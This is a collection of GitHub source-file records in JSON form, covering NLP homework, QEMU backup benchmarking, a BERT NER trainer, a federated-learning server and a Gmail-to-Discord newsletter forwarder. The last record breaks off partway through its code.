+{"seq_id":"16198278335","text":"from disassembler import *\n\ndef main():\n x = input(\"Please enter a list of integers separated by spaces: \")\n lst = x.split()\n \n print(\"Here are the characters in the string.\")\n \n for a in x:\n print(a)\n \n print(\"Here are the elements of the list after splitting the string.\")\n for b in lst:\n print(int(b))\n \n print(\"Here are the elements of the list using indexing.\")\n \n for c in range(len(lst)):\n print(lst[c])\n \n print(\"Here are the elements backwards using indexing.\")\n \n for c in range(len(lst)-1,-1,-1):\n print(lst[c])\n \n product = 1\n sum = 0\n \n for b in lst:\n product = product * int(b)\n sum = sum + int(b)\n \n print(\"The sum of the integers is\", sum, \"and the product is\", product)\n \ndisassemble(main)","repo_name":"kentdlee/CoCo","sub_path":"tests/iterators.py","file_name":"iterators.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"81"} +{"seq_id":"21254921507","text":"'''\ncs 375\ntongyu zhou\nhw 3\n'''\nimport pandas as pd\n\ndef transition_counts(corpus):\n tags = []\n for i in corpus: tags.extend([j.split('/')[1] for j in i]) \n # initializes matrix of tags\n temp = list(set(tags))\n temp.append('E')\n table = {i:{j:1 for j in temp} for i in list(set(tags))}\n table['S'] = {j:1 for j in temp}\n # counts occurences of tags in the corpus\n for line in corpus:\n table['S'][line[0].split('/')[1]] += 1\n for first, second in zip(line, line[1:]):\n table[first.split('/')[1]][second.split('/')[1]] += 1\n table[line[-1].split('/')[1]]['E'] += 1\n return table\n\ndef emission_counts(corpus):\n tags = []\n words = []\n for i in corpus: 
tags.extend([j.split('/')[1] for j in i])\n for i in corpus: words.extend([j.split('/')[0] for j in i])\n table = {i:{j:1 for j in list(set(words))} for i in list(set(tags))}\n for line in corpus:\n for l in line:\n table[l.split('/')[1]][l.split('/')[0]] += 1\n return table\n\ndef probabilities(table):\n return {i:{j:table[i][j] / float(sum(table[i].values())) for j in table[i].keys()} for i in table.keys()}\n\ndef joint_prob(sent, tags, t_prob, e_prob):\n prob = t_prob['S'][tags[0]]\n for i, j in enumerate(tags): prob *= e_prob[tags[i]][sent[i]]\n for first, second in zip(tags, tags[1:]): prob *= t_prob[first][second]\n prob *= t_prob[tags[-1]]['E']\n return prob\n\ndef state_prob(word, prev_tag, t_prob, e_prob):\n prob = []\n for k in t_prob[prev_tag].keys():\n if k == 'E': prob.append(float(0))\n else: prob.append(t_prob[prev_tag][k] * e_prob[k][word])\n return prob\n\n################################################################################\ntext = open(\"corpus.txt\", 'r').read().splitlines()\ncorpus = [l.split() for l in text]\n\nprint('Question 1.1')\nprint(pd.DataFrame(transition_counts(corpus)))\n\nprint('\\nQuestion 1.2')\nt_prob = probabilities(transition_counts(corpus))\nprint(pd.DataFrame(t_prob))\n\nprint('\\nQuestion 1.3')\nprint(pd.DataFrame(emission_counts(corpus)))\n\nprint('\\nQuestion 1.4')\ne_prob = probabilities(emission_counts(corpus))\nprint(pd.DataFrame(e_prob))\n\nprint('\\nQuestion 2.1')\nsentence = \"show your light when nothing is shining\"\na = \"NOUN PRON NOUN ADV NOUN VERB NOUN\"\nb = \"VERB PRON NOUN ADV NOUN VERB VERB\"\nc = \"VERB PRON NOUN ADV NOUN VERB NOUN\"\nprint('A prob: ' + str(joint_prob(sentence.split(), a.split(), t_prob, e_prob)))\nprint('B prob: ' + str(joint_prob(sentence.split(), b.split(), t_prob, e_prob)))\nprint('C prob: ' + str(joint_prob(sentence.split(), c.split(), t_prob, e_prob)))\n\nprint('\\nQuestion 2.2')\nviterbi_table = []\nmax_prev = 1 # probability of S\nprev_tag = 'S' # sentence start\ntags = []\nrow_names = [k for k in list(t_prob[prev_tag].keys())[:-1]]\nfor word in sentence.split():\n state = state_prob(word, prev_tag, t_prob, e_prob)\n viterbi_table.append([x * max_prev for x in state[:-1]])\n max_prev = max(viterbi_table[-1])\n max_index = viterbi_table[-1].index(max_prev)\n prev_tag = list(t_prob[prev_tag].keys())[max_index]\n tags.append(prev_tag)\ntable = pd.DataFrame(viterbi_table, index = sentence.split(), columns = row_names).transpose()\nprint(table)\nprint('POS tagging :' + str(tags))\nprint('Probability: ' + str(max(viterbi_table[-1]) * t_prob[tags[-1]]['E']))\n","repo_name":"eutopi/nlp","sub_path":"hw3/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19269131140","text":"from __future__ import print_function\n\nimport unittest\n\nfrom sage.all import *\nfrom cornacchia import cornacchia\n\n\nclass CornacchiaTest(unittest.TestCase):\n\n def test_cornacchia(self):\n d = 2\n m = 22\n res = cornacchia(d, m)\n self.assertTrue(res is not None)\n x, y = res\n print(type(x))\n print(type(y))\n self.assertTrue(type(x) == type(y) == Integer)\n self.assertTrue(x ** 2 + d * y ** 2 == m)\n self.assertTrue(gcd(x, y) == 1)\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","repo_name":"joelypoley/kplt","sub_path":"src/cornacchia_test.py","file_name":"cornacchia_test.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72642969546","text":"import argparse\nimport json\n\nimport simplebench\nfrom results_to_text import results_to_text\nfrom bench_block_job import bench_block_copy, drv_file, drv_nbd, drv_qcow2\n\n\ndef bench_func(env, case):\n \"\"\" Handle one \"cell\" of benchmarking table. \"\"\"\n cmd_options = env['cmd-options'] if 'cmd-options' in env else {}\n return bench_block_copy(env['qemu-binary'], env['cmd'],\n cmd_options,\n case['source'], case['target'])\n\n\ndef bench(args):\n test_cases = []\n\n # paths with colon not supported, so we just split by ':'\n dirs = dict(d.split(':') for d in args.dir)\n\n nbd_drv = None\n if args.nbd:\n nbd = args.nbd.split(':')\n host = nbd[0]\n port = '10809' if len(nbd) == 1 else nbd[1]\n nbd_drv = drv_nbd(host, port)\n\n for t in args.test:\n src, dst = t.split(':')\n\n if src == 'nbd' and dst == 'nbd':\n raise ValueError(\"Can't use 'nbd' label for both src and dst\")\n\n if (src == 'nbd' or dst == 'nbd') and not nbd_drv:\n raise ValueError(\"'nbd' label used but --nbd is not given\")\n\n if src == 'nbd':\n source = nbd_drv\n elif args.qcow2_sources:\n source = drv_qcow2(drv_file(dirs[src] + '/test-source.qcow2'))\n else:\n source = drv_file(dirs[src] + '/test-source')\n\n if dst == 'nbd':\n test_cases.append({'id': t, 'source': source, 'target': nbd_drv})\n continue\n\n if args.target_cache == 'both':\n target_caches = ['direct', 'cached']\n else:\n target_caches = [args.target_cache]\n\n for c in target_caches:\n o_direct = c == 'direct'\n fname = dirs[dst] + '/test-target'\n if args.compressed:\n fname += '.qcow2'\n target = drv_file(fname, o_direct=o_direct)\n if args.compressed:\n target = drv_qcow2(target)\n\n test_id = t\n if args.target_cache == 'both':\n test_id += f'({c})'\n\n test_cases.append({'id': test_id, 'source': source,\n 'target': target})\n\n binaries = [] # list of (<label>, <path>, [<options>])\n for i, q in enumerate(args.env):\n name_path = q.split(':')\n if len(name_path) == 1:\n label = f'q{i}'\n path_opts = name_path[0].split(',')\n else:\n assert len(name_path) == 2 # paths with colon not supported\n label = name_path[0]\n path_opts = name_path[1].split(',')\n\n binaries.append((label, path_opts[0], path_opts[1:]))\n\n test_envs = []\n\n bin_paths = {}\n for i, q in enumerate(args.env):\n opts = q.split(',')\n label_path = opts[0]\n opts = opts[1:]\n\n if ':' in label_path:\n # path with colon inside is not supported\n label, path = label_path.split(':')\n bin_paths[label] = path\n elif label_path in bin_paths:\n label = label_path\n path = bin_paths[label]\n else:\n path = label_path\n label = f'q{i}'\n bin_paths[label] = path\n\n x_perf = {}\n is_mirror = False\n for opt in opts:\n if opt == 'mirror':\n is_mirror = True\n elif opt == 'copy-range=on':\n x_perf['use-copy-range'] = True\n elif opt == 'copy-range=off':\n x_perf['use-copy-range'] = False\n elif opt.startswith('max-workers='):\n x_perf['max-workers'] = int(opt.split('=')[1])\n\n backup_options = {}\n if x_perf:\n backup_options['x-perf'] = x_perf\n\n if args.compressed:\n backup_options['compress'] = True\n\n if is_mirror:\n assert not x_perf\n test_envs.append({\n 'id': f'mirror({label})',\n 'cmd': 'blockdev-mirror',\n 'qemu-binary': path\n })\n else:\n test_envs.append({\n 'id': 
f'backup({label})\\n' + '\\n'.join(opts),\n 'cmd': 'blockdev-backup',\n 'cmd-options': backup_options,\n 'qemu-binary': path\n })\n\n result = simplebench.bench(bench_func, test_envs, test_cases,\n count=args.count, initial_run=args.initial_run,\n drop_caches=args.drop_caches)\n with open('results.json', 'w') as f:\n json.dump(result, f, indent=4)\n print(results_to_text(result))\n\n\nclass ExtendAction(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n items = getattr(namespace, self.dest) or []\n items.extend(values)\n setattr(namespace, self.dest, items)\n\n\nif __name__ == '__main__':\n p = argparse.ArgumentParser('Backup benchmark', epilog='''\nENV format\n\n (LABEL:PATH|LABEL|PATH)[,max-workers=N][,use-copy-range=(on|off)][,mirror]\n\n LABEL short name for the binary\n PATH path to the binary\n max-workers set x-perf.max-workers of backup job\n use-copy-range set x-perf.use-copy-range of backup job\n mirror use mirror job instead of backup''',\n formatter_class=argparse.RawTextHelpFormatter)\n p.add_argument('--env', nargs='+', help='''\\\nQemu binaries with labels and options, see below\n\"ENV format\" section''',\n action=ExtendAction)\n p.add_argument('--dir', nargs='+', help='''\\\nDirectories, each containing \"test-source\" and/or\n\"test-target\" files, raw images to used in\nbenchmarking. File path with label, like\nlabel:/path/to/directory''',\n action=ExtendAction)\n p.add_argument('--nbd', help='''\\\nhost:port for remote NBD image, (or just host, for\ndefault port 10809). Use it in tests, label is \"nbd\"\n(but you cannot create test nbd:nbd).''')\n p.add_argument('--test', nargs='+', help='''\\\nTests, in form source-dir-label:target-dir-label''',\n action=ExtendAction)\n p.add_argument('--compressed', help='''\\\nUse compressed backup. It automatically means\nautomatically creating qcow2 target with\nlazy_refcounts for each test run''', action='store_true')\n p.add_argument('--qcow2-sources', help='''\\\nUse test-source.qcow2 images as sources instead of\ntest-source raw images''', action='store_true')\n p.add_argument('--target-cache', help='''\\\nSetup cache for target nodes. 
Options:\n direct: default, use O_DIRECT and aio=native\n cached: use system cache (Qemu default) and aio=threads (Qemu default)\n both: generate two test cases for each src:dst pair''',\n default='direct', choices=('direct', 'cached', 'both'))\n\n p.add_argument('--count', type=int, default=3, help='''\\\nNumber of test runs per table cell''')\n\n # BooleanOptionalAction helps to support --no-initial-run option\n p.add_argument('--initial-run', action=argparse.BooleanOptionalAction,\n help='''\\\nDo additional initial run per cell which doesn't count in result,\ndefault true''')\n\n p.add_argument('--drop-caches', action='store_true', help='''\\\nDo \"sync; echo 3 > /proc/sys/vm/drop_caches\" before each test run''')\n\n bench(p.parse_args())\n","repo_name":"qemu/qemu","sub_path":"scripts/simplebench/bench-backup.py","file_name":"bench-backup.py","file_ext":"py","file_size_in_byte":7304,"program_lang":"python","lang":"en","doc_type":"code","stars":8597,"dataset":"github-code","pt":"81"} +{"seq_id":"21111366969","text":"from tkinter import *\nfrom gui.errormsg import error_message\n\n\nclass SelectFrame(Frame):\n \"\"\" Provides a label for recipe name and a checkbox indicating selected status.\n Contained within the canvas_frame, itself belonging to the ScrollFrame\n \"\"\"\n\n def __init__(self,\n parent: Frame,\n ssf: 'SelectionScrollFrame',\n width: int,\n height: int,\n recipe: dict,\n row: int,\n bg: str):\n Frame.__init__(self, parent, width=width, height=height)\n self.parent: Frame = parent\n self.ssf = ssf\n self.recipe_id: int = recipe['recipe_id']\n self.recipe: dict = recipe\n self.default_color: str = bg\n self.grid(column=0, row=row, sticky=(N, S, E, W)) # Sticky ensures full sizing Perhaps \"weight\" in the parent would do as well\n self.propagate(False)\n self.configure(background='blue')\n # Establishing norms for contained widgets\n self.columnconfigure(0, minsize=20)\n self.columnconfigure(1, minsize=20, weight=1) # weight allows the label to stretch!\n\n # Building contents\n self.checkbox_var: IntVar = IntVar()\n self.checkbox: Checkbutton = Checkbutton(self, height=2, variable=self.checkbox_var, command=self._select_recipe)\n self.checkbox.grid(column=0, row=0)\n self.checkbox.config(background=bg)\n # # # Label\n self.label: Label = Label(self, width=1, height=1, text=recipe['recipe_title'])\n self.label.grid(column=1, row=0, sticky=(N, S, E, W))\n self.label.config(background=bg)\n\n # Enabling scrolling action\n self.bind('<Enter>', lambda evnt: evnt.widget.bind('<MouseWheel>', self.ssf.on_mousewheel))\n self.bind('<Leave>', lambda evnt: evnt.widget.unbind_all('<MouseWheel>'))\n self.checkbox.bind('<Enter>', lambda evnt: evnt.widget.bind('<MouseWheel>', self.ssf.on_mousewheel))\n self.checkbox.bind('<Leave>', lambda evnt: evnt.widget.unbind_all('<MouseWheel>'))\n self.label.bind('<Enter>', lambda evnt: evnt.widget.bind('<MouseWheel>', self.ssf.on_mousewheel))\n self.label.bind('<Leave>', lambda evnt: evnt.widget.unbind_all('<MouseWheel>'))\n\n # Enabling recipe toggle action\n self.bind('<Button-1>', self._update_detail_frame)\n # self.checkbox.bind('<Button-1>', self._update_detail_frame) # This behavior is annoying\n self.label.bind('<Button-1>', self._update_detail_frame)\n\n def _update_detail_frame(self, event):\n print('Clicked wtf' + str(self.recipe_id))\n root: 'View' = self.ssf.parent\n root.update_detail_frame(self.recipe_id)\n if self.ssf.highlighted_frame is not None:\n self.ssf.highlighted_frame.reset_color()\n self.configure(background='blue')\n 
self.label.configure(background='light blue')\n self.checkbox.configure(background='light blue')\n self.ssf.highlighted_frame = self\n\n def _select_recipe(self):\n root: 'View' = self.ssf.parent\n root.controller.toggle_recipe(self.recipe_id)\n\n def reset_color(self):\n \"\"\" Resets the frame to its default color. Invoked when the frame is deselected. \"\"\"\n self.config(background=self.default_color)\n self.checkbox.config(background=self.default_color)\n self.label.config(background=self.default_color)\n\n","repo_name":"RyanEliopoulos/autoshopper","sub_path":"gui/SelectFrame.py","file_name":"SelectFrame.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"3803089300","text":"\"\"\"\nmain_train.py은 모델 학습을 진행하는 스크립트입니다.\ne.g. https://github.com/wisdomify/wisdomify/blob/main/main_train.py\n\"\"\"\nimport random\nimport torch\nimport wandb\nimport argparse\nimport numpy as np\nimport pytorch_lightning as pl\nfrom transformers import BertTokenizer, BertModel\nfrom BERT.datamodules import AnmSourceNERDataModule, AnmNERDataModule, SourceNERDataModule\nfrom BERT.loaders import load_config\nfrom BERT.models import BiLabelNER, MonoLabelNER, BiLabelNERWithBiLSTM\nfrom BERT.labels import ANM_LABELS, SOURCE_LABELS\nfrom BERT.paths import bi_label_ner_ckpt\nfrom pytorch_lightning.loggers import WandbLogger\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", type=str, default=\"mono_label_ner\")\n parser.add_argument(\"--ver\", type=str, default=\"test_anm\")\n args = parser.parse_args()\n config = load_config(args.model, args.ver)\n # command-line arguments 도 기록하기!\n config.update(vars(args))\n # --- fix random seeds -- #\n torch.manual_seed(config['seed'])\n random.seed(config['seed'])\n np.random.seed(config['seed'])\n # --- prepare the model and the datamodule --- #\n tokenizer = BertTokenizer.from_pretrained(config['bert'])\n bert = BertModel.from_pretrained(config['bert'])\n\n if config['model'] == BiLabelNER.name:\n model = BiLabelNER(bert=bert, lr=float(config['lr']), num_labels_pair=(len(ANM_LABELS), len(SOURCE_LABELS)))\n datamodule = AnmSourceNERDataModule(config, tokenizer)\n elif config['model'] == BiLabelNERWithBiLSTM.name:\n model = BiLabelNERWithBiLSTM(bert=bert, lr=float(config['lr']), num_labels_pair=(len(ANM_LABELS),\n len(SOURCE_LABELS)))\n datamodule = AnmSourceNERDataModule(config, tokenizer)\n elif config['model'] == MonoLabelNER.name:\n if config['label_type'] == \"anm\":\n model = MonoLabelNER(bert=bert, lr=float(config['lr']), num_labels=len(ANM_LABELS),\n hidden_size=bert.config.hidden_size)\n datamodule = AnmNERDataModule(config, tokenizer)\n elif config['label_type'] == \"source\":\n model = MonoLabelNER(bert=bert, lr=float(config['lr']), num_labels=len(SOURCE_LABELS),\n hidden_size=bert.config.hidden_size)\n datamodule = SourceNERDataModule(config, tokenizer)\n else:\n raise ValueError(f\"Invalid label_type: {config['label_type']}\")\n else:\n raise ValueError(f\"Invalid model: {config['model']}\")\n\n # --- instantiate the trainer --- #\n with wandb.init(project=\"BERT\", config=config) as run:\n logger = WandbLogger(log_model=False)\n trainer = pl.Trainer(max_epochs=config['max_epochs'],\n log_every_n_steps=config['log_every_n_steps'],\n gpus=torch.cuda.device_count(),\n enable_checkpointing=False,\n logger=logger)\n try:\n trainer.fit(model=model, datamodule=datamodule)\n except Exception as e:\n raise e\n else:\n # --- save the 
model locally, as push it to wandb as an artifact --- #\n # 오류 없이 학습이 완료되었을 때만 모델을 저장하기!\n model_path = bi_label_ner_ckpt()\n trainer.save_checkpoint(model_path)\n artifact = wandb.Artifact(name=model.name, type=\"model\", metadata=config)\n artifact.add_file(model_path, \"ner.ckpt\")\n run.log_artifact(artifact, aliases=[\"latest\", config['ver']])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pirates14/BERT","sub_path":"main_train.py","file_name":"main_train.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"13414609","text":"import zmq\nimport json\nimport time\n\nfrom intercom.minion import discover_relay\n\n\ndef dump(string):\n return bytes(json.dumps(string), 'utf-8')\n\n\nclass Controller:\n\n def __init__(self, name, relay='tcp://relay.intercom:5556'):\n self.name = name\n relay_out, relay_in = discover_relay()\n self.relay = relay_in\n self.reset()\n\n def reset(self):\n self.context = zmq.Context()\n\n def send(self, topic, msg):\n if type(topic) != bytes:\n topic = bytes(str(topic), 'utf-8')\n messagedata = bytes(json.dumps(msg), 'utf-8')\n\n socket = self.context.socket(zmq.REQ)\n socket.connect(self.relay)\n socket.send(topic + b' ' + messagedata)\n reply = socket.recv()\n assert reply\n\n\nclass SampleController(Controller):\n\n def do(self, action):\n topic = 'do:arduino.switch'\n\n msg = {'origin': self.name,\n 'group': '00011',\n 'plug': '10000',\n 'action': action,\n }\n print('Sending:', topic, msg)\n self.send(topic, msg)\n\nif __name__ == '__main__':\n\n # Obtaining optional hostname from CLI:\n import sys\n if len(sys.argv) > 1:\n host = sys.argv[1]\n else:\n host = 'relay.intercom'\n if ':' not in host:\n host += ':5556'\n\n c = SampleController('bob', 'tcp://' + host)\n while True:\n print('on')\n c.do('on')\n time.sleep(1)\n print('off')\n c.do('off')\n time.sleep(1)\n","repo_name":"oksome/Intercom","sub_path":"intercom/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"11589713761","text":"import pickle\nimport keras\nimport uuid\nfrom paillier import *\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, LeakyReLU\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras import backend as K\nimport datetime\nimport msgpack\nimport random\nimport codecs\nimport numpy as np\nimport json\nimport msgpack_numpy\nfrom keras.layers import Dense, Dropout, Flatten, Activation\nimport sys\nimport time\nfrom keras.models import load_model\nfrom flask import *\nfrom flask_socketio import SocketIO\nfrom flask_socketio import *\nlength=64\n\npriv1, pub1 = generate_keypair(length)#密钥长度\nlargeint=100000\nnp.set_printoptions(suppress=True)\nwith open(\"model_server_log.txt\", \"w\") as f:\n f.write('model_server\\n')\n f.write('密钥长度'+str(length)+'\\n')\nclass GlobalModel(object):\n \"\"\"docstring for GlobalModel\"\"\"\n def __init__(self):\n self.model = self.build_model()\n self.current_weights = self.model.get_weights()\n self.img_shape = (28,28,1)\n # for convergence check集合检查\n self.prev_train_loss = None\n # all rounds; losses[i] = [round#, timestamp, loss]\n # round# could be None if not applicable\n self.training_start_time = int(round(time.time())) # 当前时间戳四舍五入\n self.start = int(round(time.time()))\n\n def build_model(self):\n raise NotImplementedError()\n\n # client_updates = 
[(w, n)..]\n def update_weights(self, client_weights):\n #new_weights = [np.zeros(w.shape) for w in self.current_weights]\n #for i in range(len(new_weights)):\n #new_weights[i] = client_weights[i]\n self.current_weights = client_weights\n print('服务器更新成功!')\nclass GlobalModel_MNIST_CNN(GlobalModel):\n def __init__(self):\n super(GlobalModel_MNIST_CNN, self).__init__()\n\n def build_model(self):\n # ~5MB worth of parameters\n model = Sequential()\n # model.add(Conv2D(32, kernel_size=(3, 3),\n # activation='relu',\n # input_shape=(28, 28, 1)))\n # model.add(Conv2D(64, (3, 3), activation='relu'))\n # model.add(MaxPooling2D(pool_size=(2, 2)))\n # model.add(Dropout(0.25))\n # model.add(Flatten())\n # model.add(Dense(128, activation='relu'))\n # model.add(Dropout(0.5))\n # model.add(Dense(10, activation='softmax'))\n # model = Sequential([Dense(32, input_dim=784), Activation('relu'), Dense(16), \\\n # Activation('relu'), Dense(10), Activation('softmax')])\n self.img_shape = (28, 28, 1)\n model.add(Flatten(input_shape=self.img_shape))\n model.add(Dense(512))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(1024))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(256))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dense(10, activation='sigmoid'))\n\n model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.SGD(lr=0.001, momentum=0.9, decay=0.0000001, nesterov=False),\n metrics=['accuracy'])\n return model\n\nclass model_Server(object):\n MIN_NUM_WORKERS = 5\n MAX_NUM_ROUNDS = 50\n NUM_CLIENTS_CONTACTED_PER_ROUND = 5\n ROUNDS_BETWEEN_VALIDATIONS = 2\n init=True\n def __init__(self, global_model, host, port):\n self.global_model = global_model()\n self.update_client_sids = set()\n self.ready_client_sids = set()\n self.flag = 1\n self.first_id = 0\n self.secend_id = 0\n self.app = Flask(__name__)\n self.socketio = SocketIO(self.app)\n self.host = host\n self.port = port\n self.model_id = str(uuid.uuid4()) # 随机生成uuid\n\n #####\n # training states\n self.current_round = 0 # -1 for not yet started尚未开始\n self.current_round_client_updates = []\n self.eval_client_updates = []\n self.client_updates_weights = []\n self.cnt = 0\n self.i = 0\n self.a=[]\n self.register_handles()\n\n\n def register_handles(self):\n # single-threaded async, no need to lock\n\n @self.socketio.on('connect')\n def handle_connect():\n print(request.sid[0], \"connected\")\n\n @self.socketio.on('reconnect')\n def handle_reconnect():\n print(request.sid, \"reconnected\")\n\n @self.socketio.on('client_req_update')\n def handle_wake_up():\n self.ready_client_sids.add(request.sid)\n print(\"连接客户: \", request.sid,len(self.ready_client_sids))\n con=3#增加用户\n print(\"连接客户: \", request.sid, len(self.ready_client_sids)%con == 0 )\n\n if (len(self.ready_client_sids)%con == 0 ):\n while self.flag==0:\n time.sleep(0.1)\n id = []\n for idd in self.ready_client_sids:\n id.append(idd)\n self.ready_client_sids = set()\n emit('request_update', {\n 'model_id': self.model_id,\n 'round_number': self.current_round,\n 'current_weights': obj_to_pickle_string(self.global_model.current_weights),\n 'weights_format': 'pickle',\n 'priv': obj_to_pickle_string(priv1),\n 'pub': obj_to_pickle_string(pub1),\n\n }, room=id[0])\n print(\"客户端\",id[0])\n emit('request_update', {\n 'model_id': self.model_id,\n 'round_number': self.current_round,\n 'current_weights': obj_to_pickle_string(self.global_model.current_weights),\n 'weights_format': 'pickle',\n 'priv': obj_to_pickle_string(priv1),\n 'pub': obj_to_pickle_string(pub1),\n }, 
room=id[1])\n print(\"客户端\", id[1])\n emit('request_update', {\n 'model_id': self.model_id,\n 'round_number': self.current_round,\n 'current_weights': obj_to_pickle_string(self.global_model.current_weights),\n 'weights_format': 'pickle',\n 'priv': obj_to_pickle_string(priv1),\n 'pub': obj_to_pickle_string(pub1),\n }, room=id[2])\n print(\"客户端\", id[2])\n\n self.current_round+=1\n\n\n @self.socketio.on('client_update')\n def handle_client_update(data):\n self.update_client_sids.add(request.sid)\n print(\"连接更新: \", request.sid, len(self.update_client_sids))\n print(\"连接更新: \", request.sid, len(self.update_client_sids) % 3 == 0)\n self.a.append(pickle_string_to_obj(data['weights']))\n\n if (len(self.a)%3 == 0):\n self.flag=0\n t1 = time.time()\n\n self.client_updates_weights=add(self.a[0],add(self.a[1],self.a[2]))\n self.global_model.update_weights(self.client_updates_weights)\n self.flag = 1\n t2=time.time()\n with open(\"model_server_log.txt\", \"a\") as f:\n f.write(str(self.i)+'轮循环聚合时长' + str(t2 - t1) + '\\n')\n self.i+=1\n self.a=[]\n #GAN\n\n\n def start(self):\n self.socketio.run(self.app, host=self.host, port=self.port)\n\n\ndef obj_to_pickle_string(x):\n return codecs.encode(pickle.dumps(x), \"base64\").decode()\n # return msgpack.packb(x, default=msgpack_numpy.encode)\n # TODO: compare pickle vs msgpack vs json for serialization; tradeoff: computation vs network IO\n\n\ndef pickle_string_to_obj(s):\n return pickle.loads(codecs.decode(s.encode(), \"base64\")) # 模型返序列化loads,编解码en/decode\n # return msgpack.unpackb(s, object_hook=msgpack_numpy.decode)\n\n\n\n\ndef add(a,b):\n #print()\n for i in range(len(a)):\n #b[i]=b[i].tolist()\n for j in range(len(a[i])):\n if type(a[i][j])==type(1):\n a[i][j] = b[i][j]*(a[i][j])\n else:\n for k in range(len(a[i][j])):\n a[i][j][k]=b[i][j][k]*(a[i][j][k])\n return a\n\n\nif __name__ == '__main__':\n # When the application is in debug mode the Werkzeug development server is still used\n # and configured properly inside socketio.run(). 
In production mode the eventlet web server\n # is used if available, else the gevent web server is used.\n\n server = model_Server(GlobalModel_MNIST_CNN, \"192.168.1.111\", 6001)\n print(\"listening on 192.168.1.111:6001\");\n server.start()","repo_name":"894346698/Federated-Learning-Framework","sub_path":"model_server.py","file_name":"model_server.py","file_ext":"py","file_size_in_byte":8707,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"81"} +{"seq_id":"9585230756","text":"import datetime\ndef judgeDate(inputDate):\n if inputDate=='':\n return False\n today=datetime.datetime.today()\n date=inputDate.split('-')\n if not (len(date)==3):\n return False\n [year,month,day]=date\n if year=='' or month=='' or day=='':\n return False\n monthDate=[0,31,28,31,30,31,30,31,31,30,31,30,31]\n if int(year)<0:\n return False\n if int(month)>12 or int(month)<=0:\n return False\n if int(day)<=0 or int(day)>monthDate[int(month)]:\n return False\n stdDate = datetime.datetime.strptime(inputDate, \"%Y-%m-%d\")\n if stdDate<=today:\n return False #必须大于今天的日期\n return True\n\nif __name__==\"__main__\":\n date=input()\n print(judgeDate(date))","repo_name":"Blank-z0/VaccineProject","sub_path":"PublicFunctions/DateJudgement.py","file_name":"DateJudgement.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"35844782109","text":"field_match = {'AGENT_NAME': {\"'aakash'\", \"'rahul kumar'\"}, 'Employee_Name': {\"'rahul'\", \"'rahul kumar'\", \"'aakash'\"}, 'Branch_Category': {\"'a'\"}}\n\n\ndef get_dups(field_match):\n dup_field = {}\n for field, values in field_match.items():\n values = list(values)\n for value in values:\n count = 0\n match = value\n values_matched = []\n for match_field, match_values in field_match.items():\n match_values = list(match_values)\n if value in match_values and field != match_field:\n values_matched.append(match_field)\n values_matched.append(field)\n count += 1\n if count >0:\n dup_field[match.strip(\"'\")] = list(set(values_matched))\n return dup_field\nprint (get_dups(field_match))\n","repo_name":"mishrap9/SQL-Query","sub_path":"get_dup.py","file_name":"get_dup.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20317451127","text":"import base64\nimport email\nimport pickle\nfrom datetime import timedelta\nfrom os import getenv\nfrom typing import Dict, List, Tuple\n\nimport googleapiclient.discovery\nimport requests\nfrom dotenv import load_dotenv\nfrom structlog import get_logger\nfrom timeloop import Timeloop\n\nload_dotenv()\nwebhook = getenv('DISCORD_WEBHOOK')\ntl = Timeloop()\nlog = get_logger()\n\n\ndef get_new_pytricks(service: googleapiclient.discovery.Resource) -> List[Dict]:\n results = service.users().messages().list(userId='me', labelIds=['INBOX', 'UNREAD'],\n q='from:info@realpython.com subject:[🐍pytricks]').execute()\n messages = results.get('messages', [])\n return [service.users().messages().get(userId='me', id=msg['id'], format='raw').execute() for msg in messages]\n\n\ndef extract_message_content(mime_msg: email.message.Message) -> str:\n for part in mime_msg.get_payload():\n if part.get_content_maintype() == 'text':\n return part.get_payload(decode=True).decode()\n return ''\n\n\ndef get_content(message: Dict) -> Tuple[str, str]:\n msg = base64.urlsafe_b64decode(message['raw'].encode('ASCII'))\n mime_msg = 
email.message_from_bytes(msg)\n messageMainType = mime_msg.get_content_maintype()\n messageSubject = email.header.decode_header(mime_msg['subject'])[0][0].decode()\n\n if messageMainType == 'multipart':\n messageContent = extract_message_content(mime_msg)\n elif messageMainType == 'text':\n messageContent = mime_msg.get_payload(decode=True).decode()\n return messageSubject, messageContent\n\n\ndef mark_as_read(service: googleapiclient.discovery.Resource, message: Dict) -> None:\n msgId = message['id']\n body = {\"removeLabelIds\": [\"UNREAD\"]}\n response = service.users().messages().modify(userId='me', id=msgId, body=body).execute()\n log.info('Marked as read', response=response)\n\n\ndef send_to_webhook(subject: str, content: str) -> requests.models.Response:\n subject = subject.replace('_', '\\_').replace('*', '\\*')\n data = {'content': f'**{subject}**\\n```python\\n{content.split(\"------\")[0]}```\\n'}\n if len(data) < 2000:\n response = requests.post(webhook, json=data)\n else:\n parts = split_message(data)\n response = requests.post(webhook, json=parts[0])\n for part in parts[1:]:\n 